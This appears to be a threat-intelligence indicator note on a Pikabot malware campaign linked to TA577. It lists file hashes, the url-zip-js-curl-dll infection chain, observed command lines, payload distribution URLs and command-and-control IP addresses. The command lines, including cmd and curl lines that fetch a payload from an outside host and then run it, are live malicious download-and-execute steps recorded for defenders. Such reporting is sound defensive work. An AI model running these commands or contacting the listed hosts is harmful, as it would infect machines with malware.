09.02.2024 | Pikabot | TA577 | 1.8.32-beta

*************************************************

.url https://cursosrdg.ccr.edu.pe/9nqrm/
.zip a76ea4031064781902050026aabd55cc510577e3d31ca5908e92a35129cc2ce0
.js 88c88cb96ee1124683bc3518d2dccb529bd850e7cec402db8839782995a63117
.exe 555687ca3149e23ee980a3acf578e0572da556cf34c87aecf48596834d6b496f

*************************************************

url > zip > js > curl > .dll

wscript.exe C:\Users\Admin\AppData\Local\Temp\Notekx.js

cmd.exe /c mkdir  C:\Dtjfjyfjfjyykgd\Zyjyjydfdhkgfi & curl https://ealthygradi.com/tS5/0.02608313237231047.dat --output C:\Dtjfjyfjfjyykgd\Zyjyjydfdhkgfi\Ifhfdhjkshfhjkgs.exe

curl https://ealthygradi.com/tS5/0.02608313237231047.dat --output C:\Dtjfjyfjfjyykgd\Zyjyjydfdhkgfi\Ifhfdhjkshfhjkgs.exe

cmd.exe /c mkdir  C:\Dtjfjyfjfjyykgd\Zyjyjydfdhkgfi & curl 0.9607346891162636.dat --output C:\Dtjfjyfjfjyykgd\Zyjyjydfdhkgfi\Ifhfdhjkshfhjkgs.exe

curl  0.9607346891162636.dat --output C:\Dtjfjyfjfjyykgd\Zyjyjydfdhkgfi\Ifhfdhjkshfhjkgs.exe

cmd.exe /c mkdir  C:\Dtjfjyfjfjyykgd\Zyjyjydfdhkgfi & curl 0.4946220552225169.dat --output C:\Dtjfjyfjfjyykgd\Zyjyjydfdhkgfi\Ifhfdhjkshfhjkgs.exe

curl  0.4946220552225169.dat --output C:\Dtjfjyfjfjyykgd\Zyjyjydfdhkgfi\Ifhfdhjkshfhjkgs.exe

cmd.exe /c mkdir  C:\Dtjfjyfjfjyykgd\Zyjyjydfdhkgfi & curl 0.9709065170996424.dat --output C:\Dtjfjyfjfjyykgd\Zyjyjydfdhkgfi\Ifhfdhjkshfhjkgs.exe

curl  0.9709065170996424.dat --output C:\Dtjfjyfjfjyykgd\Zyjyjydfdhkgfi\Ifhfdhjkshfhjkgs.exe

cmd.exe /c mkdir  C:\Dtjfjyfjfjyykgd\Zyjyjydfdhkgfi & curl 0.1390333043518991.dat --output C:\Dtjfjyfjfjyykgd\Zyjyjydfdhkgfi\Ifhfdhjkshfhjkgs.exe

curl  0.1390333043518991.dat --output C:\Dtjfjyfjfjyykgd\Zyjyjydfdhkgfi\Ifhfdhjkshfhjkgs.exe

cmd.exe /c mkdir  C:\Dtjfjyfjfjyykgd\Zyjyjydfdhkgfi & curl 0.9028512036602045.dat --output C:\Dtjfjyfjfjyykgd\Zyjyjydfdhkgfi\Ifhfdhjkshfhjkgs.exe

curl  0.9028512036602045.dat --output C:\Dtjfjyfjfjyykgd\Zyjyjydfdhkgfi\Ifhfdhjkshfhjkgs.exe

cmd.exe /c timeout 10 & C:\Dtjfjyfjfjyykgd\Zyjyjydfdhkgfi\Ifhfdhjkshfhjkgs.exe

timeout  10 

*************************************************

**** .dll distro ****

https://wealthygradi.com/tS5/0.02608313237231047.dat
https://professionalficars.com/t6F5Gi/0.04171104253786617.dat

*************************************************

c2's

104.129.55.103:2224
178.18.246.136:2078
158.220.80.167:2967
104.129.55.104:2223
23.226.138.161:5242
37.60.242.85:9785
23.226.138.143:2083
37.60.242.86:2967
85.239.243.155:5000
158.220.80.157:9785

*************************************************
